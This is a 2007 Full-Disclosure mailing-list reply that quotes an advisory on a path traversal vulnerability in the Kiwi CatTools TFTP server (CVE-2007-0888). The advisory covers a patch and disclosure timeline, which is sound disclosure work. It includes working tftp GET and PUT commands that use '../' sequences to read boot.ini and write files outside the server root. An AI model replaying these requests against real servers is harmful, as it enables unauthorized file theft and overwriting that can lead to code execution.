[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [Full-disclosure] Kiwi CatTools TFTP server path traversal
From: 3APA3A <3APA3A () SECURITY ! NNOV ! RU>
Date: 2007-02-27 15:17:45
Message-ID: 1491349282.20070227181745 () SECURITY ! NNOV ! RU
[Download RAW message or body]
Probably, it's same or related issue for reported by nicob at nicob.net.
http://securityvulns.com/news/KIWI/CatTools/DT.html
CVE-2007-0888
--Wednesday, February 28, 2007, 12:47:17 AM, you wrote to bugtraq@securityfocus.com:
n> Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8
n> server can lead to information disclosure and remote code execution
n> Risk: High
n> DISCUSSION
n> Kiwi CatTools TFTP server doesn't properly verify filename in PUT and GET
n> request which can be used to download/upload any file from/to server.
n> Default setting allows replacing of existing files. Such settings lead to
n> probability to replace an executable files and run code on attacker choice.
n> EXAMPLES
C:\>>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt
n> Transfer successful: 212 bytes in 1 second, 212 bytes/s
C:\>>type boot.txt
n> [boot loader]
n> timeout=30
n> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
C:\>>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt
n> Transfer successful: 212 bytes in 1 second, 212 bytes/s
C:\>>type pttest.txt
n> [boot loader]
n> timeout=30
n> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
C:\>>
n> SOLUTION
n> Upgrade to CatTools 3.2.9 which is available for download at
n> <http://www.kiwisyslog.com/downloads.php>
n> http://www.kiwisyslog.com/downloads.php
n> CREDITS
n> Sergey Gordeychik of Positive Technologies (www.ptsecurity.com)
n> DISCLOSURE TIMELINE
n> Vulnerability discovered: 11/20/2006
n> Initial vendor contact: 12/08/2006
n> Patch released: 02/13/2007
n> Public disclosure: 02/27/2007
--
~/ZARAZA http://securityvulns.com/
Пока вы во власти провидения, вам не удастся умереть раньше срока. (Твен)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic